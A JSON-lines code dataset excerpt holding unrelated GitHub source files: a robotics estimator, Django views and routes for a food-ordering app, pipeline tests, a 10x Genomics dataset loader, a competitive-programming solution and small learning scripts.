np.sum(foot_contacts) == 0:\n return np.array((0, 0, self._robot.mpc_body_height))\n else:\n foot_positions_robot_frame = self._robot.foot_positions_in_base_frame\n ground_orientation_matrix_robot_frame = p.getMatrixFromQuaternion(\n self.ground_orientation_robot_frame)\n ground_orientation_matrix_robot_frame = np.array(\n ground_orientation_matrix_robot_frame).reshape((3, 3))\n foot_positions_ground_frame = (foot_positions_robot_frame.dot(\n 
ground_orientation_matrix_robot_frame.T))\n foot_heights = -foot_positions_ground_frame[:, 2]\n return np.array((\n 0,\n 0,\n np.sum(foot_heights * foot_contacts) / np.sum(foot_contacts),\n ))\n\n @property\n def com_orientation_quat_ground_frame(self):\n _, orientation = p.invertTransform([0., 0., 0.],\n self.ground_orientation_robot_frame)\n return np.array(orientation)\n\n @property\n def com_velocity_ground_frame(self):\n _, world_orientation_ground_frame = p.invertTransform(\n [0., 0., 0.], self.ground_orientation_world_frame)\n return np.array(\n p.multiplyTransforms([0., 0., 0.], world_orientation_ground_frame,\n self._com_velocity_world_frame,\n [0., 0., 0., 1.])[0])\n\n @property\n def com_rpy_rate_ground_frame(self):\n com_quat_world_frame = p.getQuaternionFromEuler(self._robot.base_rpy_rate)\n _, world_orientation_ground_frame = p.invertTransform(\n [0., 0., 0.], self.ground_orientation_world_frame)\n _, com_quat_ground_frame = p.multiplyTransforms(\n [0., 0., 0.], world_orientation_ground_frame, [0., 0., 0.],\n com_quat_world_frame)\n return np.array(p.getEulerFromQuaternion(com_quat_ground_frame))\n\n @property\n def com_velocity_body_frame(self) -> Sequence[float]:\n \"\"\"The base velocity projected in the body aligned inertial frame.\n\n The body aligned frame is a intertia frame that coincides with the body\n frame, but has a zero relative velocity/angular velocity to the world frame.\n\n Returns:\n The com velocity in body aligned frame.\n \"\"\"\n return self._com_velocity_body_frame\n\n @property\n def ground_normal(self):\n return self._ground_normal\n\n @property\n def gravity_projection_vector(self):\n _, world_orientation_ground_frame = p.invertTransform(\n [0., 0., 0.], self.ground_orientation_world_frame)\n return np.array(\n p.multiplyTransforms([0., 0., 0.], world_orientation_ground_frame,\n [0., 0., 1.], [0., 0., 0., 1.])[0])\n\n @property\n def ground_orientation_robot_frame(self):\n normal_vec = self.ground_normal\n axis = np.array([-normal_vec[1], normal_vec[0], 0])\n axis /= np.linalg.norm(axis)\n angle = np.arccos(normal_vec[2])\n return np.array(p.getQuaternionFromAxisAngle(axis, angle))\n\n @property\n def ground_orientation_world_frame(self) -> Sequence[float]:\n return np.array(\n p.multiplyTransforms([0., 0., 0.], self._robot.base_orientation_quat,\n [0., 0., 0.],\n self.ground_orientation_robot_frame)[1])\n","repo_name":"yxyang/fast_and_efficient","sub_path":"src/convex_mpc_controller/com_velocity_estimator.py","file_name":"com_velocity_estimator.py","file_ext":"py","file_size_in_byte":7000,"program_lang":"python","lang":"en","doc_type":"code","stars":53,"dataset":"github-code","pt":"72"} +{"seq_id":"13494935671","text":"from django.urls import path\nfrom .views import account_view, edit_account_view, crop_image, edit_bio\n\napp_name = \"account\"\n\nurlpatterns = [\n path(\"/\", account_view, name=\"account\"),\n path(\"/edit/\", edit_account_view, name=\"edit\"),\n path(\"/edit/cropImg/\", crop_image, name=\"crop\"),\n path(\"edit/bio/\", edit_bio, name=\"edit bio\"),\n]\n","repo_name":"rockingrohit9639/realtime-chat","sub_path":"account/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"6144473099","text":"\ndef lin():\n print(\"\\033[1;32m==\\033[0;0m\" * 30)\n\n\ndef idade(ano, mes, dia):\n from datetime import date\n atual_ano = date.today().year\n atual_mes = date.today().month\n atual_dia = date.today().day\n 
idade = atual_ano - ano\n if idade < 0:\n return f\"\\033[1;31mValor inválido. Reinicie o programa e tente novamente.\\033[0;0m\"\n else:\n if mes <= atual_mes:\n lin()\n print(f\"Você possui {idade} ano(s), {abs(atual_mes - mes)} mes(es) e {abs(atual_dia - dia)} dia(s).\")\n lin()\n \n idade_dias = (idade * 365) + (mes * 30) + dia\n return f\"\\033[1;34mSua idade em dias é {idade_dias}.\\033[0;0m\"\n lin()\n \n else:\n lin()\n print(f\"Você possui {idade - 1} ano(s), {abs(atual_mes)} mes(es) e {abs(atual_dia - dia)} dia(s).\")\n lin()\n \n idade_dias = (idade * 365) + (mes * 30) + dia\n return f\"\\033[1;34mSua idade em dias é {idade_dias}.\\033[0;0m\"\n lin()\n \n\n\nano = int(input(\"Em que ano você nasceu? \"))\nmes = int(input(\"Em que mês você nasceu? \"))\ndia = int(input(\"Em qual dia você nasceu? \"))\n\nlin()\nprint(idade(ano, mes, dia))\n","repo_name":"marianabsctba/Python_Pygame","sub_path":"Questão02_versão02_TP1.py","file_name":"Questão02_versão02_TP1.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"77532999","text":"import allure\nimport json\nimport pytest\n\nfrom datetime import datetime, timedelta\nfrom collections import defaultdict\n\nfrom crypta.lib.python.identifiers.identifiers import GenericID\nfrom crypta.lib.python.yql_runner.tests import canonize_output\n\nfrom crypta.graph.soup.config.python import ( # noqa\n ID_TYPE as id_type,\n SOURCE_TYPE as source_type,\n LOG_SOURCE as log_source,\n EDGE_TYPE as edges,\n)\n\n\nTEST_FAILED = False\n\nYT_DIR = \"yt-data\"\nYT_ID = \"yt-graph-all-local-test\"\nPROXY_PORT = 9013\n\nDEVID_RAW_PATH = \"//crypta/production/state/graph/indevice/2016-04-11/perfect/devid_month/\"\nPAIRS_PATH = \"//crypta/production/state/graph/2016-04-11/pairs/\"\n\n\ndef get_file_uploads():\n import yatest\n\n geodata = yatest.common.build_path(\"crypta/graph/v1/tests/sandbox-data/geodata4.bin\")\n url_to_groups = yatest.common.build_path(\"crypta/graph/v1/tests/sandbox-data/UrlToGroups.yaml\")\n dt = datetime.now() - timedelta(days=1)\n return [\n (geodata, \"//statbox/statbox-dict-last/geodata4.bin\"),\n (url_to_groups, dt.strftime(\"//statbox/statbox-dict-by-name/UrlToGroups.yaml/%Y-%m-%d\")),\n ]\n\n\n@pytest.mark.usefixtures(\"graph\")\n@pytest.mark.usefixtures(\"ytlocal\")\n@pytest.mark.usefixtures(\"crypta_env\")\n@pytest.mark.usefixtures(\"stream_import_dyntable\")\nclass TestGraphAllLocal(object):\n def test_graph_run(self, graph):\n allure.attach(\"YT errors\", (json.dumps(graph.report.errors, sort_keys=True, indent=4)))\n allure.attach(\"Max execution time\", str(graph.report.max_time))\n assert not graph.report.errors\n assert graph.report.max_time < timedelta(minutes=10)\n if graph.run_status is None:\n assert 0, \"Graph run status is not defined\"\n assert graph.run_status, \"Graph fail\"\n\n @canonize_output\n def test_graph_canon_tables(self, graph):\n return sorted(\n [\n str(table)\n for root in (\"//home\", \"//crypta\", \"//statbox\", \"//logs\")\n for table in graph.yt.search(\n root, node_type=(\"table\",), follow_links=True, attributes=(\"_yql_row_spec\",)\n )\n ]\n )\n\n def test_yuid_apps(self, graph):\n yuid_apps = \"//crypta/production/state/graph/2016-04-11/yuid_apps\"\n yuid_apps_upload = \"//crypta/production/state/graph/2016-04-11/yuid_apps_upload\"\n assert graph.yt.exists(yuid_apps)\n assert graph.yt.row_count(yuid_apps) > 0\n assert graph.yt.exists(yuid_apps_upload)\n assert graph.yt.row_count(yuid_apps_upload) 
> 0\n\n def test_no_dump_soup_dups(self, graph):\n logins = \"//crypta/production/state/graph/v2/soup/puid_login_passport-profile_passport-dict\"\n counts = defaultdict(int)\n for rec in graph.yt.read_table(logins):\n counts[(rec[\"id1\"], rec[\"id2\"])] += 1\n\n assert all([x == 1 for x in counts.values()])\n logins = set([x[1] for x in counts.keys()])\n assert \"govshit\" in logins\n\n def test_email_to_phone(self, graph):\n email_to_phone = \"//crypta/production/state/graph/v2/soup/email_phone_email-to-phone_preproc\"\n assert graph.yt.row_count(email_to_phone) == 1\n rec = next(graph.yt.read_table(email_to_phone))\n assert rec[\"id1\"] == \"89518545837@gmail.com\"\n assert rec[\"id2\"] == \"+79518545837\"\n\n def test_market_orders_log(self, graph):\n email_phone = \"//crypta/production/state/graph/v2/soup/email_phone_orders_yandex-market\"\n email_puid = \"//crypta/production/state/graph/v2/soup/email_puid_orders_yandex-market\"\n email_uuid = \"//crypta/production/state/graph/v2/soup/email_uuid_orders_yandex-market\"\n email_yandexuid = \"//crypta/production/state/graph/v2/soup/email_yandexuid_orders_yandex-market\"\n phone_puid = \"//crypta/production/state/graph/v2/soup/phone_puid_orders_yandex-market\"\n phone_uuid = \"//crypta/production/state/graph/v2/soup/phone_uuid_orders_yandex-market\"\n phone_yandexuid = \"//crypta/production/state/graph/v2/soup/phone_yandexuid_orders_yandex-market\"\n puid_uuid = \"//crypta/production/state/graph/v2/soup/puid_uuid_orders_yandex-market\"\n\n assert graph.yt.row_count(email_phone) == 1\n assert graph.yt.row_count(email_puid) == 2\n assert graph.yt.row_count(email_uuid) == 1\n assert graph.yt.row_count(email_yandexuid) == 1\n assert graph.yt.row_count(phone_puid) == 1\n assert graph.yt.row_count(phone_uuid) == 1\n assert graph.yt.row_count(phone_yandexuid) == 1\n assert graph.yt.row_count(puid_uuid) == 1\n\n rec = next(graph.yt.read_table(email_phone))\n assert rec[\"id1\"] == \"marketemail@orders.ru\"\n assert rec[\"id2\"] == \"+79161234567\"\n\n @pytest.mark.parametrize(\n \"id_type,old_id\",\n [\n (\"yandexuid\", \"999999991543414614\"),\n (\"icookie\", \"999999991543414614\"),\n (\"idfa\", \"DEADBEEF-C0DE-CAFE-BABE-8BADF00DDEAD\"),\n (\"gaid\", \"deadbeef-c0de-cafe-babe-8badf00ddead\"),\n (\"mm_device_id\", \"deadbeef-c0de-cafe-babe-8badf00ddead\"),\n (\"uuid\", \"deadbeefc0decafebabe8badf00ddead\"),\n ],\n )\n def test_eternal_idstorage(self, graph, id_type, old_id):\n info = list(graph.yt.read_table(\"//crypta/production/ids_storage/{}/eternal\".format(id_type)))\n assert len(info) > 1\n assert len({x[\"id_type\"] for x in info}) == 1\n assert info[0][\"id_type\"] == id_type\n assert old_id in {x[\"id\"] for x in info}\n ids = [x[\"id\"] for x in info]\n valid = [GenericID(id_type, x).is_valid() for x in ids]\n assert all(valid), \"Waiter, there are invalid identifiers in my soup! 
(%s)\" % str(zip(ids, valid))\n\n def test_yandex_drive_shared(self, graph):\n yandex_drive = \"//crypta/production/state/graph/shared/yandex_drive/2016-04-11\"\n assert graph.yt.exists(yandex_drive)\n assert graph.yt.row_count(yandex_drive) == 3\n rec = next(graph.yt.read_table(yandex_drive))\n assert rec[\"id\"] == \"00002907a397aea15dbfbdcf0472a112\"\n assert rec[\"id_type\"] == \"mm_device_id\"\n assert rec[\"source\"] == \"Yandex Drive\"\n\n assert graph.yt.exists(\"//crypta/production/ids_storage/uuid/yandex_drive\")\n assert graph.yt.row_count(\"//crypta/production/ids_storage/uuid/yandex_drive\") == 2\n assert graph.yt.exists(\"//crypta/production/ids_storage/mm_device_id/yandex_drive\")\n assert graph.yt.row_count(\"//crypta/production/ids_storage/mm_device_id/yandex_drive\") == 1\n\n def test_merge_shared(self, graph):\n shared_merged = \"//crypta/production/state/graph/shared/merged/2016-04-11\"\n assert graph.yt.exists(shared_merged)\n assert graph.yt.row_count(shared_merged) == 5\n rec = next(graph.yt.read_table(shared_merged))\n assert rec[\"id\"] == \"00002907a397aea15dbfbdcf0472a112\"\n assert rec[\"id_type\"] == \"mm_device_id\"\n assert rec[\"source\"] == [\"Yandex Drive\"]\n\n shared = \"//crypta/production/ids_storage/shared/common_shared\"\n assert graph.yt.exists(shared)\n assert graph.yt.row_count(shared) == 5\n rec = next(graph.yt.read_table(shared))\n assert rec[\"id\"] == \"00002907a397aea15dbfbdcf0472a112\"\n assert rec[\"id_type\"] == \"mm_device_id\"\n assert rec[\"shared_types\"] == [\"YANDEX_DRIVE\"]\n\n def test_heuristic_desktop_shared_yuids(self, graph):\n heuristic_desktop_shared_yuids = \"//crypta/production/state/graph/shared/heuristic_desktop_yuids/2016-04-11\"\n assert graph.yt.exists(heuristic_desktop_shared_yuids)\n assert graph.yt.row_count(heuristic_desktop_shared_yuids) == 2\n rec = next(graph.yt.read_table(heuristic_desktop_shared_yuids))\n assert rec[\"id\"] == \"601826891455541119\"\n assert rec[\"id_type\"] == \"yandexuid\"\n assert rec[\"source\"] == \"Heuristic shared desktop yuid\"\n\n @pytest.mark.parametrize(\n \"id1_type, id2_type, source_type\",\n (\n (id_type.LOGIN, id_type.EMAIL, source_type.LOGIN_TO_EMAIL),\n (id_type.EMAIL, id_type.PHONE, source_type.EMAIL_TO_PHONE),\n (id_type.EMAIL, id_type.EMAIL_MD5, source_type.MD5_HASH),\n (id_type.EMAIL, id_type.EMAIL_SHA256, source_type.SHA256_HASH),\n (id_type.EMAIL_MD5, id_type.EMAIL_SHA256, source_type.HASH_TO_HASH),\n (id_type.PHONE, id_type.PHONE_MD5, source_type.MD5_HASH),\n ),\n )\n def test_soup_cooked_soup_preprocessing_edges(self, graph, id1_type, id2_type, source_type):\n \"\"\"Should check is soup preprocessing tables are correctly created\"\"\"\n table_path = \"//crypta/production/state/graph/v2/soup/{table_name}\".format(\n table_name=edges.name(edges.get_edge_type(id1_type, id2_type, source_type, log_source.SOUP_PREPROCESSING))\n )\n assert graph.yt.exists(table_path)\n assert graph.yt.row_count(table_path) > 0\n record = next(graph.yt.read_table(table_path))\n assert record[\"id1Type\"] == id1_type.Name\n assert record[\"id2Type\"] == id2_type.Name\n assert record[\"sourceType\"] == source_type.Name\n # check is identifiers are valid\n assert GenericID(id1_type.Name, record[\"id1\"]).is_valid()\n assert GenericID(id2_type.Name, 
record[\"id2\"]).is_valid()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"crypto/test-graph-all/test_graph_all_local.py","file_name":"test_graph_all_local.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33853541523","text":"\nDATA_DIR_PATH = './data'\nNET_DIR_PATH = './nets'\nRESULTS_DIR_PATH = './results'\n\nWDBC_LRATE = 0.1\nWDBC_NEPOCH = 100\n\nGRADES_LRATE = 0.05\nGRADES_NEPOCH = 100\n\nAUDIT_LRATE = 0.05\nAUDIT_NEPOCH = 100\n\nCONFIGS = {\n\t'WDBC' : {\n\t\t'TRAIN': {\n\t\t\t'learning_rate' : WDBC_LRATE,\n\t 'num_epoch' : WDBC_NEPOCH,\n\t 'init_network_filename' :'sample.NNWDBC.init',\n\t 'training_data_filename' : 'wdbc.train',\n\t 'trained_network_filename' : 'kevin.NNWDBC.{0}.{1}.trained'.format( str(WDBC_LRATE).split('.')[1], WDBC_NEPOCH )\n\t\t}, \n\t\t'TEST': {\n\t\t\t'trained_network_filename' : 'kevin.NNWDBC.{0}.{1}.trained'.format( str(WDBC_LRATE).split('.')[1], WDBC_NEPOCH ),\n\t\t\t'testing_data_filename' : 'wdbc.test',\n\t\t\t'results_filename' : 'kevin.NNWDBC.{0}.{1}.results'.format( str(WDBC_LRATE).split('.')[1], WDBC_NEPOCH )\n\t\t}\n\t}, \n\t'Grades' : {\n\t\t'TRAIN': {\n\t\t\t'learning_rate' : GRADES_LRATE,\n\t 'num_epoch' : GRADES_NEPOCH,\n\t 'init_network_filename' : 'sample.NNGrades.init',\n\t 'training_data_filename' : 'grades.train',\n\t 'trained_network_filename' : 'kevin.NNGrades.{0}.{1}.trained'.format( str(GRADES_LRATE).split('.')[1], GRADES_NEPOCH )\n\t\t}, \n\t\t'TEST' : {\n\t\t\t'trained_network_filename' : 'kevin.NNGrades.{0}.{1}.trained'.format( str(GRADES_LRATE).split('.')[1], GRADES_NEPOCH ),\n\t 'testing_data_filename' : 'grades.test', \n\t \t'results_filename' : 'kevin.NNGrades.{0}.{1}.results'.format( str(GRADES_LRATE).split('.')[1], GRADES_NEPOCH ) \n\t\t}\n\t},\n\n\t# CHANGE THIS STUFF TO LOAD Audit risk NETWORK AND STUFF\n\t'WDBC_mini' : {\n\t\t'TRAIN': {\n\t\t\t'learning_rate' : WDBC_LRATE,\n\t 'num_epoch' : 1,\n\t 'init_network_filename' :'sample.NNWDBC.init',\n\t 'training_data_filename' : 'wdbc.mini_train',\n\t 'trained_network_filename' : 'kevin.NNWDBC.{0}.1.mini_trained'.format( str(WDBC_LRATE).split('.')[1], 1 )\n\t\t}, \n\t\t'TEST': {\n\t\t\t'trained_network_filename' : 'kevin.NNWDBC.{0}.1.trained'.format( str(WDBC_LRATE).split('.')[1], 1 ),\n\t\t\t'testing_data_filename' : 'wdbc.test',\n\t\t\t'results_filename' : 'kevin.NNWDBC.{0}.1.results'.format( str(WDBC_LRATE).split('.')[1], 1 )\n\t\t}\n\t},\n\n\n\t# CHANGE THIS STUFF TO LOAD Audit risk NETWORK AND STUFF\n\t'Audit' : {\n\t\t'TRAIN': {\n\t\t\t'learning_rate' : AUDIT_LRATE,\n\t 'num_epoch' : AUDIT_NEPOCH,\n\t 'init_network_filename' : 'kevin.NNAudit.init',\n\t 'training_data_filename' : 'auditrisk.processed.train',\n\t 'trained_network_filename' : 'kevin.NNAudit.{0}.{1}.trained'.format( str(AUDIT_LRATE).split('.')[1], AUDIT_NEPOCH )\n\t\t}, \n\t\t'TEST' : {\n\t\t\t'trained_network_filename' : 'kevin.NNAudit.{0}.{1}.trained'.format( str(AUDIT_LRATE).split('.')[1], AUDIT_NEPOCH ),\n\t 'testing_data_filename' : 'auditrisk.processed.test', \n\t \t'results_filename' : 'kevin.NNAudit.{0}.{1}.results'.format( str(AUDIT_LRATE).split('.')[1], AUDIT_NEPOCH ) \n\t\t}\n\t}\n}","repo_name":"keyao21/AI_Projects","sub_path":"NeuralNet/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33068553891","text":"import logging\nimport os\nimport 
shutil\nimport tarfile\nimport warnings\n\nimport numpy as np\n\nfrom scvi import settings\nfrom scvi.data._download import _download\n\nlogger = logging.getLogger(__name__)\n\navailable_datasets = {\n \"1.1.0\": [\n \"frozen_pbmc_donor_a\",\n \"frozen_pbmc_donor_b\",\n \"frozen_pbmc_donor_c\",\n \"fresh_68k_pbmc_donor_a\",\n \"cd14_monocytes\",\n \"b_cells\",\n \"cd34\",\n \"cd56_nk\",\n \"cd4_t_helper\",\n \"regulatory_t\",\n \"naive_t\",\n \"memory_t\",\n \"cytotoxic_t\",\n \"naive_cytotoxic\",\n ],\n \"1.3.0\": [\"1M_neurons\"],\n \"2.1.0\": [\"pbmc8k\", \"pbmc4k\", \"t_3k\", \"t_4k\", \"neuron_9k\"],\n \"3.0.0\": [\n \"pbmc_1k_protein_v3\",\n \"pbmc_10k_protein_v3\",\n \"malt_10k_protein_v3\",\n \"pbmc_1k_v2\",\n \"pbmc_1k_v3\",\n \"pbmc_10k_v3\",\n \"hgmm_1k_v2\",\n \"hgmm_1k_v3\",\n \"hgmm_5k_v3\",\n \"hgmm_10k_v3\",\n \"neuron_1k_v2\",\n \"neuron_1k_v3\",\n \"neuron_10k_v3\",\n \"heart_1k_v2\",\n \"heart_1k_v3\",\n \"heart_10k_v3\",\n ],\n \"3.1.0\": [\"5k_pbmc_protein_v3\", \"5k_pbmc_protein_v3_nextgem\"],\n}\n\ndataset_to_group = {\n dataset_name: group\n for group, list_datasets in available_datasets.items()\n for dataset_name in list_datasets\n}\n\ngroup_to_url_skeleton = {\n \"1.1.0\": \"http://cf.10xgenomics.com/samples/cell-exp/{}/{}/{}_{}_gene_bc_matrices.tar.gz\",\n \"1.3.0\": \"http://cf.10xgenomics.com/samples/cell-exp/{}/{}/{}_{}_gene_bc_matrices_h5.h5\",\n \"2.1.0\": \"http://cf.10xgenomics.com/samples/cell-exp/{}/{}/{}_{}_gene_bc_matrices.tar.gz\",\n \"3.0.0\": \"http://cf.10xgenomics.com/samples/cell-exp/{}/{}/{}_{}_feature_bc_matrix.h5\",\n \"3.1.0\": \"http://cf.10xgenomics.com/samples/cell-exp/{}/{}/{}_{}_feature_bc_matrix.h5\",\n}\n\ngroup_to_filename_skeleton = {\n \"1.1.0\": \"{}_gene_bc_matrices.tar.gz\",\n \"1.3.0\": \"{}_gene_bc_matrices_h5.h5\",\n \"2.1.0\": \"{}_gene_bc_matrices.tar.gz\",\n \"3.0.0\": \"{}_feature_bc_matrix.h5\",\n \"3.1.0\": \"{}_feature_bc_matrix.h5\",\n}\n\n\ndef _load_dataset_10x(\n dataset_name: str = None,\n filename: str = None,\n save_path: str = \"data/10X\",\n url: str = None,\n return_filtered: bool = True,\n remove_extracted_data: bool = False,\n **scanpy_read_10x_kwargs,\n):\n try:\n import scanpy\n except ImportError as err:\n raise ImportError(\"Please install scanpy -- `pip install scanpy`\") from err\n\n # form data url and filename unless manual override\n if dataset_name is not None:\n if url is not None:\n warnings.warn(\n \"dataset_name provided, manual url is disregarded.\",\n UserWarning,\n stacklevel=settings.warnings_stacklevel,\n )\n if filename is not None:\n warnings.warn(\n \"dataset_name provided, manual filename is disregarded.\",\n UserWarning,\n stacklevel=settings.warnings_stacklevel,\n )\n group = dataset_to_group[dataset_name]\n url_skeleton = group_to_url_skeleton[group]\n\n filter_type = \"filtered\" if return_filtered else \"raw\"\n url = url_skeleton.format(group, dataset_name, dataset_name, filter_type)\n filename_skeleton = group_to_filename_skeleton[group]\n filename = filename_skeleton.format(filter_type)\n save_path = os.path.join(save_path, dataset_name)\n elif filename is not None and url is not None:\n logger.info(\"Loading 10X dataset with custom url and filename\")\n elif filename is not None and url is None:\n logger.info(\"Loading local 10X dataset with custom filename\")\n else:\n logger.info(\"Loading extracted local 10X dataset with custom filename\")\n _download(url, save_path=save_path, filename=filename)\n file_path = os.path.join(save_path, filename)\n\n # untar\n download_is_targz 
= url[-7:] == \".tar.gz\"\n was_extracted = False\n if download_is_targz is True:\n if not os.path.exists(file_path[:-7]): # nothing extracted yet\n if tarfile.is_tarfile(file_path):\n logger.info(\"Extracting tar file\")\n tar = tarfile.open(file_path, \"r:gz\")\n tar.extractall(path=save_path)\n was_extracted = True\n tar.close()\n path_to_data_folder, suffix = _find_path_to_mtx(save_path)\n adata = scanpy.read_10x_mtx(path_to_data_folder, **scanpy_read_10x_kwargs)\n if was_extracted and remove_extracted_data:\n folders_in_save_path = path_to_data_folder[len(save_path) + 1 :].split(\"/\")\n extracted_folder_path = save_path + \"/\" + folders_in_save_path[0]\n logger.info(f\"Removing extracted data at {extracted_folder_path}\")\n shutil.rmtree(extracted_folder_path)\n else:\n adata = scanpy.read_10x_h5(file_path, **scanpy_read_10x_kwargs)\n\n adata.var_names_make_unique()\n scanpy.pp.filter_cells(adata, min_counts=1)\n scanpy.pp.filter_genes(adata, min_counts=1)\n\n return adata\n\n\ndef _find_path_to_mtx(save_path: str) -> tuple[str, str]:\n \"\"\"Returns exact path for the data in the archive.\n\n This is required because 10X doesn't have a consistent way of storing their data.\n Additionally, the function returns whether the data is stored in compressed format.\n\n Returns\n -------\n path in which files are contains and their suffix if compressed.\n\n \"\"\"\n for root, _, files in os.walk(save_path):\n # do not consider hidden files\n files = [f for f in files if not f[0] == \".\"]\n contains_mat = [\n filename == \"matrix.mtx\" or filename == \"matrix.mtx.gz\" for filename in files\n ]\n contains_mat = np.asarray(contains_mat).any()\n if contains_mat:\n is_tar = files[0][-3:] == \".gz\"\n suffix = \".gz\" if is_tar else \"\"\n return root, suffix\n raise FileNotFoundError(\"No matrix.mtx(.gz) found in path (%s).\" % save_path)\n","repo_name":"scverse/scvi-tools","sub_path":"scvi/data/_built_in_data/_dataset_10x.py","file_name":"_dataset_10x.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","stars":1037,"dataset":"github-code","pt":"72"} +{"seq_id":"15139111999","text":"#!/usr/bin/env python3\nimport sys\n\nYES = \"Yes\" # type: str\nNO = \"No\" # type: str\n\n\ndef gcd(a, b):\n if b>a:\n a, b = b, a\n while b>0:\n a, b = b, a%b\n return a\n\ndef solve(T: int, A: \"List[int]\", B: \"List[int]\", C: \"List[int]\", D: \"List[int]\"):\n for i in range(T):\n a, b, c, d = A[i], B[i], C[i], D[i]\n if ad:\n print('No')\n continue\n x = (c-a+1)%b\n g = gcd(b, d)\n print('No' if -(-x//g*g) - x + c+1 < b else 'Yes')\n\n\n return\n\n\n# Generated by 1.1.3 https://github.com/kyuridenamida/atcoder-tools (tips: You use the default template now. 
You can remove this line by using your custom template)\ndef main():\n def iterate_tokens():\n for line in sys.stdin:\n for word in line.split():\n yield word\n tokens = iterate_tokens()\n T = int(next(tokens)) # type: int\n A = [int()] * (T) # type: \"List[int]\" \n B = [int()] * (T) # type: \"List[int]\" \n C = [int()] * (T) # type: \"List[int]\" \n D = [int()] * (T) # type: \"List[int]\" \n for i in range(T):\n A[i] = int(next(tokens))\n B[i] = int(next(tokens))\n C[i] = int(next(tokens))\n D[i] = int(next(tokens))\n solve(T, A, B, C, D)\n\nif __name__ == '__main__':\n main()","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source Codes/AtCoder/agc026/B/4592388.py","file_name":"4592388.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"72696943914","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom store.models import *\nimport datetime\nfrom django.contrib.auth.decorators import login_required\nfrom django.http import JsonResponse\nfrom django.views.decorators.csrf import csrf_exempt\ndef index(request):\n context={}\n return render(request, 'store/index.html', context)\n\ndef placeView(request):\n context={\n 'place': Restaurant.objects.order_by('place').values('place').distinct()\n }\n \n \n\n return render(request, 'store/cities_view.html', context)\n\ndef restaurants_view(request,qcity):\n \n context={\n 'restaurants': Restaurant.objects.filter(place=qcity)\n }\n return render(request, 'store/restaurants_list.html', context)\n\ndef restaurant_foods(request,rt):\n tmp=Restaurant.objects.get(pk=rt)\n FoodOrder.objects.all().delete()\n food_categories=Food.objects.filter(restaurant=tmp).order_by('category').values('category').distinct()\n fcat_list=[]\n for fcat in food_categories:\n fcat_list.append(fcat['category'])\n \n\n context={\n 'rid':rt,\n 'restaurant_foods':Food.objects.filter(restaurant=tmp).order_by('-sale'),\n 'fcat_list':fcat_list,\n 'rating':Restaurant.objects.get(pk=rt).rating,\n 'descrpn':Restaurant.objects.get(pk=rt).description,\n 'rname':Restaurant.objects.get(pk=rt).name,\n 'ratingint':int(Restaurant.objects.get(pk=rt).rating),\n 'rem':int(5)-int(Restaurant.objects.get(pk=rt).rating)\n }\n return render(request, 'store/restaurant_foods.html', context)\n\ndef profileView(request):\n context = {'user': request.user}\n return render(request, 'store/profile.html', context)\n\ndef login(request):\n return HttpResponse(\"\")\n\n@csrf_exempt\n@login_required\ndef food_cart(request):\n \n response_data={\n 'message':None,\n\n }\n food_id=request.POST['food_id']\n amt = request.POST['amt'] \n \n instnc=Food.objects.get(pk=food_id)\n try:\n tmp=FoodOrder.objects.get(food=instnc)\n \n tmp.total_amt=amt\n tmp.save() \n response_data['message']=0\n except: \n \n \n FoodOrder.objects.create(food=instnc,order_time=datetime.datetime.now(),customer=request.user,total_amt=amt) \n response_data['message']=1\n \n\n return JsonResponse(response_data)\n\n@csrf_exempt\n@login_required\ndef checkout(request):\n orders=FoodOrder.objects.all()\n net_amt=0\n order_list=[]\n try:\n for order in orders:\n nsale=order.food.sale+int(order.total_amt)\n order.food.sale=nsale\n order.food.save()\n mrpf=order.food.mrp\n new_amt=mrpf*order.total_amt\n net_amt=net_amt+new_amt\n if order.total_amt > 0:\n olap=order.food.name+str(' x ')+str(order.total_amt)+str(' = ')+str(new_amt)\n order_list.append(olap)\n\n rname=order.food.restaurant.name\n 
rid=order.food.restaurant.pk\n odate=order.order_time\n\n PastOrders.objects.create(foodlist=order_list,customer2=request.user,cost=net_amt,restname=rname,order_date=odate)\n context={\n 'net_amt':net_amt,\n 'order_list':order_list,\n 'rid':rid,\n } \n\n except:\n context={\n \n 'order_list':order_list,\n \n } \n return render(request, 'store/checkout.html', context) \n\n@login_required\ndef pastView(request):\n customer3=request.user\n tmp=PastOrders.objects.filter(customer2=customer3).order_by('-order_date')\n \n context={\n 'order_list':tmp,\n \n }\n\n return render(request, 'store/pastorders.html',context) \n\n@csrf_exempt\n@login_required\ndef rate_restaurant(request):\n response_data={\n 'message':None,\n\n }\n rid=request.POST['rid']\n rating=request.POST['rating']\n try:\n instnc=Restaurant.objects.get(pk=rid) \n instnc.total_rating = instnc.total_rating + int(rating) \n instnc.total_users = instnc.total_users + int(1)\n instnc.rating=instnc.total_rating/instnc.total_users\n instnc.save()\n response_data['message'] = 1\n except:\n response_data['message'] = 0\n \n\n return JsonResponse(response_data)\n\n\n@csrf_exempt\n@login_required\ndef rate(request):\n orders=FoodOrder.objects.all()\n \n\n for order in orders:\n \n rid=order.food.restaurant.pk\n \n\n \n context={\n \n 'rid':rid,\n } \n return render(request, 'store/rate.html', context) ","repo_name":"arron-tij/Tummy-Truck","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"25476451217","text":"import numpy as np\nimport math\n\nclass LG:\n def __init__(self,dataIn,dataOut): #constructor\n self.dataIn=dataIn\n self.dataOut=dataOut\n self.normalized_dataIn=self.normalizeDataIn()[0]\n def normalizeDataIn(self):\n list_means=[]\n noAttributes=len(self.dataIn[0])\n n=len(self.dataOut)\n for i in range(noAttributes):\n 